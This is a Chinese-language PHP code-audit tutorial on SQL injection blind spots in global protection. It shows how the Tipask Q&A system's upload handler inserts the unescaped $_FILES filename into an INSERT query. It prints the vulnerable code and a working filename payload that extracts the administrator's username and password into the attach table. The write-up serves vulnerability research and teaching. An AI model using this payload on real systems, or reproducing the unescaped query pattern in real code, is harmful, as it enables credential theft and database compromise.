正在阅读:

【PHP代码审计】那些年我们一起挖掘SQL注入-7.全局防护盲点的总结下篇

3,127

0x01 背景

现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启,然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的,接上篇http://www.cnbraid.com/2016/04/29/sql5/,这里介绍另外两种情况。

盲点如下:

①FILES注入,全局只转义掉GET、POST等传来的参数,遗漏了FILES;

②变量覆盖,危险函数:extract()、parse_str()、$$。

0x02 漏洞分析

FILES注入

FILES注入一般情况是是因为上传时把上传的名字带到insert入库产生的,这里看下tipask问答系统

首先看看它的全局防护是怎么处理的:

index.php里:
include TIPASK_ROOT . '/model/tipask.class.php';
$tipask = new tipask();
$tipask->run();
... ...
跟进到/model/tipask.class.php里:
function init_request() {
... ...
        $this->get = taddslashes($this->get, 1);
        $this->post = taddslashes(array_merge($_GET, $_POST));
        checkattack($this->post, 'post');
        checkattack($this->get, 'get');
        unset($_POST);
    }

可以看到对get和post传来的数据进行了addslashes特殊转义处理,对$_FILES没有任何处理操作,我们全局搜索$_FILES,发现/control/attach.php有上传处理,我们跟进:

<?php
function onupload() {
	//上传配置
	$config = array(
		"uploadPath" => "data/attach/", //保存路径
		"fileType" => array(".rar", ".doc", ".docx", ".zip", ".pdf", ".txt", ".swf", ".wmv", "xsl"), //文件允许格式
		"fileSize" => 10 //文件大小限制,单位MB
	);

	//文件上传状态,当成功时返回SUCCESS,其余值将直接返回对应字符窜
	$state = "SUCCESS";
	$clientFile = $_FILES["upfile"];
	if (!isset($clientFile)) {
		echo "{'state':'文件大小超出服务器配置!','url':'null','fileType':'null'}"; //请修改php.ini中的upload_max_filesize和post_max_size
		exit;
	}

	//格式验证
	$current_type = strtolower(strrchr($clientFile["name"], '.'));
	if (!in_array($current_type, $config['fileType'])) {
		$state = "不支持的文件类型!";
	}
	//大小验证
	$file_size = 1024 * 1024 * $config['fileSize'];
	if ($clientFile["size"] > $file_size) {
		$state = "文件大小超出限制!";
	}
	//保存文件
	if ($state == "SUCCESS") {
		$targetfile = $config['uploadPath'] . gmdate('ym', $this->time) . '/' . random(8) . strrchr($clientFile["name"], '.');
		$result = $_ENV['attach']->movetmpfile($clientFile, $targetfile);
		if (!$result) {
			$state = "文件保存失败!";
		} else {
			//这里将上传的文件名带入数据库查询
			$_ENV['attach']->add($clientFile["name"], $current_type, $clientFile["size"], $targetfile, 0);
		}
	}
    //向浏览器返回数据json数据
	echo '{"state":"' . $state . '","url":"' . $targetfile . '","fileType":"' . $current_type . '","original":"' . $clientFile["name"] . '"}';
}

可以看到这句$_ENV[‘attach’]->add($clientFile[“name”]…),将$clientFile[name] = $_FILES[“upfile”][name]带入了如下add入库的操作,从而造成注入。

<?php
function add($filename,$ftype,$fsize,$location,$isimage=1) {
	$uid=$this->base->user['uid'];
	$this->db->query("INSERT INTO ".DB_TABLEPRE."attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");
	return $this->db->insert_id();
}

上传一个文件,然后修改文件名称为以下代码即可获取管理员账户密码:

filename="1','.php',1,(select concat(username,0x23,password) from ask_user limit 1),2,1)#.jpg"

数据库里成功将管理员账户密码插入到attach表中:

sql6_01

原文地址:http://www.cnbraid.com/2016/05/10/sql6/

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌